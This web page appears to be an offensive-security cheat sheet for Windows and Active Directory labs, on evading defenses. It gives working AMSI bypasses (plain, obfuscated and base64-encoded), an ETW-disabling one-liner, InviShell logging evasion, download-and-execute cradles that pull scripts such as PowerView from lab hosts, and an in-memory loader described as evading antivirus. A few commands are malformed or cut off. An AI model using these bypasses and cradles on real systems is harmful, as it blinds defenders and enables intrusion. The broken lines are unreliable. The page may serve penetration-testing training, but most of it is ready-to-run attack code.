Skip to content

🛡️ Bypass defenses

⚠️ This only changes the execution policy for the current process, it is NOT a bypass: 

 Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
# Run a command directly without spawning a full session
powershell -c 
# Bypass execution policy using environment variable
powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"

InviShell

InviShell bypasses PowerShell logging (Script Block Logging, Module Logging, Transcription) by hooking .NET assemblies, hiding activity from defenders. 

# Run as Administrator
C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

# Run without Admin privileges
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# import powerview
. C:\AD\Tools\PowerView.ps

BYPASS AMSI

¿What is AMSI?

Anti-Malware Scan Interface (AMSI) is a Windows security feature that intercepts and scans scripts and commands in memory before execution (PowerShell, VBScript, etc.) and sends them to the AV/Defender for analysis. It must be bypassed before running any offensive tool.

$a = 'System.Management.Automation.A'; $b = 'msi'; $c = 'Utils'
$ref = [Ref].Assembly.GetType(($a+$b+$c))
$ref.GetField(('amsi'+'Init'+'Failed'),'NonPublic,Static').SetValue($null,$true)

Obfuscated version (harder to detect) 

S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Put that in a file 

Invoke-Command ([scriptblock]::Create([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('JABrADgAVgBRADMAIAA9ACAAWwBTAFQAUgBpAE4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAYgB5AHQAZQBbAF0AXQAoADAAeAA1ADMALAAwAHgANwA5ACkAKQApACwAIgAkACgAWwBjAGgAYQByAF0AMAB4ADcAMwApACQAKABbAGMAaABhAHIAXQAwAHgANwA0ACkAJAAoAFsAYwBoAGEAcgBdADAAeAA2ADUAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYARAApACQAKABbAGMAaABhAHIAXQAwAHgAMgBFACkAIgAsACQAKAAkAGsAMwA3ADcANAA9ACcANABDAHYAKAA8ADkAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAA3ADkALAAwAHgAMgAyACwAMAB4ADEAOAApADsAJABrAGIAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABrADMANwA3ADQAKQA7AC0AagBvAGkAbgAoADAALgAuACgAJABiAC4ATABlAG4AZwB0AGgALQAxACkAfAAlAHsAWwBjAGgAYQByAF0AKAAkAGIAWwAkAF8AXQAtAGIAeABvAHIAJABrAGIAWwAkAF8AJQAkAGsAYgAuAEwAZQBuAGcAdABoAF0AKQB9ACkAKQAsACIAJAAoAFsAYwBoAGEAcgBdADAAeAA2ADEAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYANwApACQAKABbAGMAaABhAHIAXQAwAHgANgA1ACkAJAAoAFsAYwBoAGEAcgBdADAAeAA2AEQAKQAkACgAWwBjAGgAYQByAF0AMAB4ADYANQApACQAKABbAGMAaABhAHIAXQAwAHgANgBFACkAJAAoAFsAYwBoAGEAcgBdADAAeAA3ADQAKQAkACgAWwBjAGgAYQByAF0AMAB4ADIARQApACQAKABbAGMAaABhAHIAXQAwAHgANAAxACkAJAAoAFsAYwBoAGEAcgBdADAAeAA3ADUAKQAkACgAWwBjAGgAYQByAF0AMAB4ADcANAApACIALAAkACgAJABrADMAMwAyADEAPQAnAHMALgA5AHYAZAA6AD0AZAA6AFQAPgAnADsAJABiAD0AWwBiAHkAdABlAFsAXQBdACgAMAB4ADEAQwAsADAAeAA0ADMALAAwAHgANQA4ACwAMAB4ADAAMgAsADAAeAAwAEQALAAwAHgANQA1ACwAMAB4ADUAMwAsADAAeAA0AEEALAAwAHgANwBCACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAMwAzADIAMQApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawAxADAAMAA4AD0AJwBSAGIAUwBXAFgAUwA6AHgAcABGACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMwBGACwAMAB4ADEAMQAsADAAeAAzAEEALAAwAHgAMAAyACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAMQAwADAAOAApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawA3ADIAOAA5AD0AJwBSAG4AKQByADcAMgB2AFsAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAAyADYALAAwAHgAMAA3ACwAMAB4ADQANQAsADAAeAAwADEAKQA7ACQAawBiAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAawA3ADIAOAA5ACkAOwAtAGoAbwBpAG4AKAAwAC4ALgAoACQAYgAuAEwAZQBuAGcAdABoAC0AMQApAHwAJQB7AFsAYwBoAGEAcgBdACgAJABiAFsAJABfAF0ALQBiAHgAbwByACQAawBiAFsAJABfACUAJABrAGIALgBMAGUAbgBnAHQAaABdACkAfQApACkAKQA7ACAAJABoAG4AUgBBADMAagBFAFMAIAA9ACAAWwBTAFQAUgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAIAAkACgAJABrADgAMQA0ADEAPQAnAEcALgBoACkAUAA1AGcAPwBJAEkAJwA7ACQAYgA9AFsAYgB5AHQAZQBbAF0AXQAoADAAeAAyADYALAAwAHgANAAzACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsAOAAxADQAMQApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAJAAoACQAawA0ADMAOQAzAD0AJwByAFAAKQB7AF8AKAB0ACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMAAxACwAMAB4ADMAOQAsADAAeAA2ADAALAAwAHgAMQA1ACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsANAAzADkAMwApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACwAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAGIAeQB0AGUAWwBdAF0AKAAwAHgANgA5ACwAMAB4ADcANAAsADAAeAA0ADYAKQApACkALAAoAC0AagBvAGkAbgAoAFsAYwBoAGEAcgBdADAAeAA2ADEALAAgAFsAYwBoAGEAcgBdADAAeAA2ADkALAAgAFsAYwBoAGEAcgBdADAAeAA2AEMALAAgAFsAYwBoAGEAcgBdADAAeAA2ADUALAAgAFsAYwBoAGEAcgBdADAAeAA2ADQAKQApACkAOwAgACQAQwBTAFYAaABIAEYAIAA9ACAAWwBSAEUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4AZwBFAFQAVABZAHAARQAoACQAawA4AHYAcQAzACkAOwAgACQASQA1AHIAUwA5AHEAIAA9ACAAJABDAFMAVgBoAGgARgAuAEcARQBUAEYAaQBFAEwARAAoACQAaABOAHIAQQAzAGoAZQBzACwAIAAkACgAJABrADQANQA4ADYAPQAnAHYAMAB5AFgAMABbACcAOwAkAGIAPQBbAGIAeQB0AGUAWwBdAF0AKAAwAHgAMwA4ACwAMAB4ADUARgAsADAAeAAxADcALAAwAHgAMAA4ACwAMAB4ADQANQAsADAAeAAzADkALAAwAHgAMQBBACwAMAB4ADUAOQAsADAAeAAxAEEALAAwAHgANwA0ACwAMAB4ADYAMwAsADAAeAAyAEYALAAwAHgAMQA3ACwAMAB4ADQANAAsADAAeAAxADAALAAwAHgAMwBCACkAOwAkAGsAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGsANAA1ADgANgApADsALQBqAG8AaQBuACgAMAAuAC4AKAAkAGIALgBMAGUAbgBnAHQAaAAtADEAKQB8ACUAewBbAGMAaABhAHIAXQAoACQAYgBbACQAXwBdAC0AYgB4AG8AcgAkAGsAYgBbACQAXwAlACQAawBiAC4ATABlAG4AZwB0AGgAXQApAH0AKQApACkAOwAgACQASQA1AFIAUwA5AFEALgBzAEUAdABWAGEATAB1AEUAKAAkAG4AdQBsAGwALAAgACgAIQAwACkAKQA7AAoAaQBmACAAKAAkAGYAYQBsAHMAZQApACAAewAKACAAIAAgACAAJAByAGEAbgBkAG8AbQBHAHUAaQBkACAAPQAgAFsAZwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwAgACQAaABtAGEAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEgATQBBAEMAUwBIAEEAMgA1ADYAOwAgACQAaABtAGEAYwAuAEsAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAHIAYQBuAGQAbwBtAEcAdQBpAGQAKQA7ACAAJABoAGEAcwBoACAAPQAgACQAaABtAGEAYwAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAiAEkAbgBwAHUAdABEAGEAdABhACIAKQApADsAIAAkAGgAYQBzAGgAUwB0AHIAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaAApAC4AUgBlAHAAbABhAGMAZQAoACcALQAnACwAJwAnACkACgB9AAoAaQBmACAAKAA0ADYAIAAtAGcAdAAgADkAKQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAuACIAIAAtAE4AbwBOAGUAdwBsAGkAbgBlACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIALAAiACAALQBOAG8ATgBlAHcAbABpAG4AZQAgAH0AOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIA'))))


iex (iwr -UseBasicParsing http://172.16.100.x/amsibypass.txt

ETW bypass

¿What is ETW?

Event Tracing for Windows (ETW) is a Windows logging system that records events from the kernel and applications, including PowerShell activity. It must be bypas

[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

From file 

iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)

Load PowerView remotely 

$url = "http://172.16.100.44/PowerView.ps1"
iex (New-Object Net.WebClient).DownloadString($url)

Loader

Loads and executes binaries in memory to evade AV/Defender. Supports both local and remote paths. 

# Load from local path
C:\AD\Tools\Loader.exe -path C:\AD\Tools\<tool>.exe -args "<arguments>"

# Load remotely via port proxy
C:\AD\Tools\Loader.exe -path http://127.0.0.1:8080/<tool>.exe -args "<arguments>"